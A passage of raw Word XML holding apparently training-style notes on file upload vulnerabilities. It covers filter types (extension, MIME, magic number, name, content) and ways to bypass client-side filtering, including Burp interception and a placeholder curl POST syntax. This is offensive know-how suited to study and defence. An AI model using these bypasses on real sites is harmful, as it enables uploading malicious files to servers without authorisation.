          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Filtering occurs before the file is even uploaded to the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A1DEFB" w14:textId="098B67AD" w:rsidR="009F1D23" w:rsidRPr="0084205E" w:rsidRDefault="009F1D23" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Easy to bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44150BEC" w14:textId="4AE5CDD6" w:rsidR="009F1D23" w:rsidRPr="0084205E" w:rsidRDefault="009F1D23" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Server-side</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D167450" w14:textId="0CD2F9F6" w:rsidR="009F1D23" w:rsidRPr="0084205E" w:rsidRDefault="009F1D23" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>PHP, C#, Node.js, Python, Ruby on Rails, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CBFBE1" w14:textId="2688A8D1" w:rsidR="009F1D23" w:rsidRPr="0084205E" w:rsidRDefault="009F1D23" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>More difficult to bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C115A4" w14:textId="0215C438" w:rsidR="009F1D23" w:rsidRPr="0084205E" w:rsidRDefault="009F1D23" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Must form payload that conforms to filters in place while allowing execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18154BAC" w14:textId="06730DE9" w:rsidR="009F1D23" w:rsidRPr="0084205E" w:rsidRDefault="009F1D23" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Types of filters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E95B78" w14:textId="7E7AE750" w:rsidR="009F1D23" w:rsidRPr="0084205E" w:rsidRDefault="009F1D23" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Extension Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C08F0BB" w14:textId="42DE72D4" w:rsidR="009F1D23" w:rsidRPr="0084205E" w:rsidRDefault="009F1D23" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Blacklist or whitelist certain extensions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE81271" w14:textId="101C830B" w:rsidR="009F1D23" w:rsidRPr="0084205E" w:rsidRDefault="009F1D23" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Can be bypassed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DC05E7" w14:textId="55CB092F" w:rsidR="009F1D23" w:rsidRPr="0084205E" w:rsidRDefault="009F1D23" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>File Type Filtering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692C2903" w14:textId="6D8B198C" w:rsidR="009F1D23" w:rsidRPr="0084205E" w:rsidRDefault="009F1D23" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Similar to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> extension validation, more intensive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6011A3" w14:textId="75CF230F" w:rsidR="009F1D23" w:rsidRPr="0084205E" w:rsidRDefault="009F1D23" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>MIME Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2680F0CF" w14:textId="4973B841" w:rsidR="009F1D23" w:rsidRPr="0084205E" w:rsidRDefault="009F1D23" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Identifier for files, usually over email or HTTP(S)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77706077" w14:textId="174B2F27" w:rsidR="009F1D23" w:rsidRPr="0084205E" w:rsidRDefault="009F1D23" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>MIME type for file upload located in header of request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5CAD41" w14:textId="664448A0" w:rsidR="009F1D23" w:rsidRPr="0084205E" w:rsidRDefault="009F1D23" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ex. Content-Type: &lt;type&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A311FE" w14:textId="57C4479A" w:rsidR="00FF3B5F" w:rsidRPr="0084205E" w:rsidRDefault="00FF3B5F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Follow &lt;type&gt;/&lt;subtype&gt; format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFBD4F6" w14:textId="5E2AB5D4" w:rsidR="00FF3B5F" w:rsidRPr="0084205E" w:rsidRDefault="00FF3B5F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Easy to bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278E6E2B" w14:textId="76E441C3" w:rsidR="00FF3B5F" w:rsidRPr="0084205E" w:rsidRDefault="00FF3B5F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Magic Number Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBBBE5E" w14:textId="77C382CA" w:rsidR="00FF3B5F" w:rsidRPr="0084205E" w:rsidRDefault="00FF3B5F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>More accurate determination of file contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227D694C" w14:textId="7B42BE14" w:rsidR="00FF3B5F" w:rsidRPr="0084205E" w:rsidRDefault="00FF3B5F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Magic number of a file is a string of bytes at the very beginning of the file content which identify the content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A82FD4D" w14:textId="5ABB1D08" w:rsidR="00FF3B5F" w:rsidRPr="0084205E" w:rsidRDefault="00FF3B5F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ex. PNG file would have the following</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5755A1BC" w14:textId="587A16E9" w:rsidR="00FF3B5F" w:rsidRPr="0084205E" w:rsidRDefault="00FF3B5F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="8"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>89 50 4E 47 0D 0A 1A 0A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECDC250" w14:textId="2F9AD4F1" w:rsidR="00FF3B5F" w:rsidRPr="0084205E" w:rsidRDefault="00FF3B5F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Common in Unix systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E7DB9E" w14:textId="4E7BD0F8" w:rsidR="00FF3B5F" w:rsidRPr="0084205E" w:rsidRDefault="00FF3B5F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>File Length Filtering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0CA935" w14:textId="4C28E166" w:rsidR="00FF3B5F" w:rsidRPr="0084205E" w:rsidRDefault="00FF3B5F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Prevent huge files from being uploaded to the server via an upload form</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575BE37D" w14:textId="09AD6F0E" w:rsidR="00FF3B5F" w:rsidRPr="0084205E" w:rsidRDefault="00FF3B5F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>File Name Filtering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8A1239" w14:textId="06E0957C" w:rsidR="00FF3B5F" w:rsidRPr="0084205E" w:rsidRDefault="00FF3B5F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Check if pre-existing or contain bad characters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D35A89" w14:textId="3B661961" w:rsidR="00FF3B5F" w:rsidRPr="0084205E" w:rsidRDefault="00FF3B5F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Null bytes or forward slashes on Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E88198" w14:textId="6DAC5C6B" w:rsidR="00FF3B5F" w:rsidRPr="0084205E" w:rsidRDefault="00FF3B5F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Control characters such </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>as ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> and Unicode characters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0862609F" w14:textId="19253071" w:rsidR="00FF3B5F" w:rsidRPr="0084205E" w:rsidRDefault="00FF3B5F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>May have to go hunting for shell on a well-administered system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C01B5E" w14:textId="05B2659D" w:rsidR="00FF3B5F" w:rsidRPr="0084205E" w:rsidRDefault="00FF3B5F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>File Content Filtering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F0E12C" w14:textId="499764EA" w:rsidR="00FF3B5F" w:rsidRPr="0084205E" w:rsidRDefault="00FF3B5F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Prevents extension spoofing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50073A5A" w14:textId="1C03EA7E" w:rsidR="00FF3B5F" w:rsidRPr="0084205E" w:rsidRDefault="00FF3B5F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Complex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55209083" w14:textId="5329BCF6" w:rsidR="00FF3B5F" w:rsidRPr="0084205E" w:rsidRDefault="00FF3B5F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Often used in conjunction to prevent gaps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0342FC51" w14:textId="6883E396" w:rsidR="00FF3B5F" w:rsidRPr="0084205E" w:rsidRDefault="00FF3B5F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Any can be applied client or server side or both</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BEEAE1" w14:textId="79BBEC8E" w:rsidR="00FF3B5F" w:rsidRPr="0084205E" w:rsidRDefault="00FF3B5F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Different languages and frameworks also filter differently</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396EFFD1" w14:textId="708B83FC" w:rsidR="00AD0D9A" w:rsidRPr="0084205E" w:rsidRDefault="00AD0D9A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Bypassing Client-Side Filtering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33534C97" w14:textId="64F2053E" w:rsidR="00AD0D9A" w:rsidRPr="0084205E" w:rsidRDefault="00AD0D9A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Four easy ways to bypass typical client-side file upload filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C01908" w14:textId="0B7A8367" w:rsidR="00AD0D9A" w:rsidRPr="0084205E" w:rsidRDefault="00AD0D9A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Turn off JS in your browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760FB698" w14:textId="5D44714D" w:rsidR="00AD0D9A" w:rsidRPr="0084205E" w:rsidRDefault="00AD0D9A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Intercept and modify the incoming page – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="25BB8651" w14:textId="65ADFE73" w:rsidR="00AD0D9A" w:rsidRPr="0084205E" w:rsidRDefault="00AD0D9A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Strip out JS filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F076235" w14:textId="0E7E246C" w:rsidR="00AD0D9A" w:rsidRPr="0084205E" w:rsidRDefault="00AD0D9A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Intercept and modify the file upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1847ECBF" w14:textId="79BC40F0" w:rsidR="00AD0D9A" w:rsidRPr="0084205E" w:rsidRDefault="00AD0D9A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Burp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46142B7A" w14:textId="6CA73A51" w:rsidR="00AD0D9A" w:rsidRPr="0084205E" w:rsidRDefault="00AD0D9A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Send the file directly to the upload point</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66753819" w14:textId="5920E934" w:rsidR="00AD0D9A" w:rsidRPr="0084205E" w:rsidRDefault="00AD0D9A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Using curl, post data directly to page containing the code for handling the files upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9F6394" w14:textId="49A2EF87" w:rsidR="00AD0D9A" w:rsidRPr="0084205E" w:rsidRDefault="00AD0D9A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Syntax: curl -X POST -F “submit:&lt;value&gt;” -F “&lt;file-parameter</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt;:@</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&lt;path-to-file&gt;”&lt;site&gt;</w:t>
      </w:r>
    </w:p>
